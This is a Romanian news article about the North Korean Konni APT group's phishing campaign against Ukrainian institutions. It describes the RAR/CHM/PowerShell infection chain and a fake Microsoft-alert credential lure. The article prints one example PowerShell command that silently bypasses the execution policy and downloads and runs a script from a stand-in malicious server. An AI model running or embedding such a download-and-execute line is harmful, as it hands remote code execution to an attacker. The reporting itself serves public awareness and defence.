Spionaj cibernetic: Coreea de Nord, acuzată că își intensifică atacurile informatice asupra Ucrainei

Gruparea nord-coreeană de spionaj cibernetic Konni APT a lansat un atac informatic îndreptat împotriva Ucrainei prin care vizează în special instituțiile guvernamentale.

Această ofensivă digitală are ca scop monitorizarea conflictului ruso-ucrainean și colectarea de date despre strategiile militare ale Kremlinului.

Cine sunt Konni APT?

Meta construiește un centru de date AI uriaș în Texas

21:27

Donald Trump amenință Spania cu noi tarife vamale

20:56

Konni APT, cunoscută și sub denumirile de Opal Sleet, Osmium, TA406 și Vedalia, este o grupare nord-coreeană de spionaj cibernetic. Activ de peste un deceniu, grupul a țintit entități guvernamentale din Coreea de Sud, Statele Unite, Rusia și, mai nou, Ucraina.

Arma principală a nord-coreenilor se numește Konni RAT (n.n. – Remote Access Trojan), cunoscut și ca UpDog. Este vorba despre un program malware (software rău intenționat) versatil, care le permite supravegherea continuă și chiar controlul total al dispozitivelor compromise.

Cea mai recentă campanie a hackerilor Konni a început în februarie 2025. Aceasta vizează colectarea de informații cu privire la „traiectoria invaziei ruse” în Ucraina, potrivit Medium.com. Departe de a se limita la interceptarea comunicațiilor, malware-ul vizează perspective strategice, politice și militare, care pot influența deciziile Phenianului în ceea ce privește sprijinul acordat Rusiei în acest conflict militar.

Phishing mascat în expertiză geopolitică

Foto: Proofpoint.com

Tactica preferată a atacatorilor presupune trimiterea de e-mailuri aparent inofensive, dar atent fabricate, care se dau drept comunicări din partea unor așa-zise grupuri de experți în politică și securitate.

Potrivit Proofpoint, o firmă de top în domeniul securității informatice pentru întreprinderi, mesajele fac referire la subiecte sensibile din actualitatea ucraineană. Este vorba despre destituiri la nivel înalt în armata ucraineană sau alegerile prezidențiale din Ucraina pentru a câștiga încrederea destinatarilor.

Odată ce victima deschide fișierul atașat, care de obicei este o arhivă RAR cu parolă denumită „Analytical Report.rar”, se execută un fișier CHM capabil să lanseze un script PowerShell. Acesta inițiază o etapă secundară a atacului informatic, descărcând alte scripturi menite să extragă informații sensibile, să stabilească accesul pe termen lung și, probabil, să pregătească terenul pentru un backdoor personalizat.

De obicei, hackerii Konni APT se bazează pe platforme gratuite precum Gmail, Outlook sau ProtonMail pentru a trimite în mod repetat mesajele periculoase, iar descărcările sunt găzduite pe servicii precum MEGA. În unele variante ale atacurilor au fost detectate și metode alternative, precum fișiere HTML care duc la arhive ZIP cu fișiere LNK și PDF. Aparent inofensive, acestea ascund componente malware capabile să execute comenzi VBScript și PowerShell, relatează Cybersecuritynews.com.

O structură tipică de comenzi ar putea semăna cu: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command „$c=’IEX (New-Object Net.WebClient).DownloadString(”http://compromised-server.com/payload.ps1”)’; iex $c”

Deși payload-ul final nu a fost identificat de cercetători în toate cazurile, toate indiciile duc spre existența unei componente de tip backdoor, concepută să faciliteze supravegherea de lungă durată și eventuale acțiuni de sabotaj digital.

Ce urmărește Konni APT

Experții în securitate cibernetică spun că scopul acestor atacuri este de a oferi regimului de la Phenian o imagine clară a angajamentului militar ucrainean, dar și a gradului de implicare al Rusiei.

Se bănuiește că aceste date ar putea influența deciziile liderilor nord-coreeni în ceea ce privește eventuale mișcări suplimentare, fie trimiterea de personal militar, fie furnizarea de armament către Moscova.

Gruparea nord-coreeană nu se află la primul atac de acest gen. Konni a desfășurat anterior operațiuni de tip spear phishing menite să compromită conturi de e-mail, folosind alerte false de securitate Microsoft pentru a colecta acreditări. De exemplu, au circulat mesaje care avertizau despre „activitate suspectă de autentificare”, redirecționând victimele către site-uri capcană precum „jetmf[.]com”.